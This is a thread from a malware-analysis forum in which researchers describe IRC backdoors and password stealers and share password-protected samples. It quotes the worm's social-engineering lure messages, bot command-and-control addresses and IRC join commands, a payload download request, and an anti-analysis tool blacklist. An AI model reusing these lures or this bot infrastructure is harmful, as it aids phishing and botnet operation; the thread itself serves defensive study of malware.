A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #4055  by nullptr
 Sat Dec 18, 2010 11:39 am
An IRC backdoor with some interesting strings.
SEINFELD_SUPERMAN
I'm never going to take picture of myself again! They always turn out like this.
Tell me what you think of this picture I edited. Thanks!
This is the funniest photo ever! What do you think?
Tell me what you think of this photo of me?
I just got a new hair cut! Tell me what you think?
I don't think I will ever sleep again after seeing this photo! Take a look.
I cant believe I still have this picture of you from last winter. Do you remember it?
Should I make this my default picture? Or does it look too evil?
My parents are going to kill me, if they find this picture. But does it look bad?
Original file + decrypted attached.
Attachments
pass : malware
 #4056  by EP_X0FF
 Sat Dec 18, 2010 11:43 am
Must be spreading messages, targeting the contact list :)
I've something like this in my ICQ antibot logs.
 #4116  by nullptr
 Thu Dec 23, 2010 8:37 am
An IRC bot, password stealer. Runs as %windir%\tanga.exe
// 212.59.0.8:80
GET /k-austo.exe HTTP/1.1
If-Modified-Since: Wed, 22 Dec 2010 20:52:45 GMT
If-None-Match: "6a882cb-1a000-49805ef5dc140"
User-Agent: Mozilla/4.0 (compatible)
Host: hxxp://www.ahava.lt

// 207.210.96.152:6567
JOIN #kausto# c1rc0dus0leil
JOIN #causto# c1rc0dus0leil
Contains a small blacklist: Wireshark, tcpview, filemon, procmon
Original file, decrypted and ****strings attached.
Attachments
pass : malware
 #7854  by EP_X0FF
 Fri Aug 05, 2011 9:29 am
Momibot/AllNite, if someone is interested. abuse.ch mistakenly marked it as SpyEye.

Attached: both the dropper and the unpacked sample.
.168.1.2:6667#AllNiteCafe
Original
http://www.virustotal.com/file-scan/rep ... 1312535222

Unpacked
http://www.virustotal.com/file-scan/rep ... 1312534957
Attachments
pass: malware
 #8334  by EP_X0FF
 Mon Aug 29, 2011 4:06 pm
markusg wrote: (A) siljedaehaksaengdonggeokeopeulyuchulbon 1.mpg.exe
MD5   : 92abb5a40aa3ecdf9da29345c060efae
http://www.virustotal.com/file-scan/rep ... 1314630930
Protected by Themida.

Under Themida, an incredibly primitive piece of Delphi code.

A form with a TWebBrowser component and TSocketDM. The trash spawned an IE window with trash (what a surprise) in the caption and then died. Yeah, I think it's some sort of skiddie backdoor :)
